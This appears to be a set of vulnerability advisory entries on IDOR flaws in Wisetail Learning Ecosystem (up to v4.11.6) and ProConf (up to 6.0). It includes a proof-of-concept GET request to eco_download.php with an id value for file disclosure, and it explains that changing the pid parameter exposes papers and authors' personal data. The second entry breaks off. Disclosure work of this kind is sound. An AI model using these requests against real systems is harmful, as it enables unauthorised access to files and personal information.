Category: Insecure Direct Object Reference

Wisetail Learning Ecosystem (LE) up to v4.11.6 Multiple IDOR Vulnerabilities

Description: Wisetail Learning Ecosystem (LE) up to v4.11.6 suffers from multiple insecure direct object reference (IDOR) vulnerabilities that allow a user to download files and access the course materials.

Vendor Website: wisetail.com

Proof-of-Concept:

    // File Disclosure
    GET /eco_download.php?id=2639 HTTP/1.1
    Host: xxxxxxx
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:63.0)...

IDOR on ProConf Peer-Review and Conference Management System

Description: In ProConf version <=6.0, an Insecure Direct Object Reference (IDOR) allows any author to view and grab all submitted papers (Title & Abstract) and their authors' personal information (Name, Email, Organization & Position) by changing the value of the Paper ID (param pid=xxxx).

Vendor Website: proconf.org & myproconf.org

Proof-of...
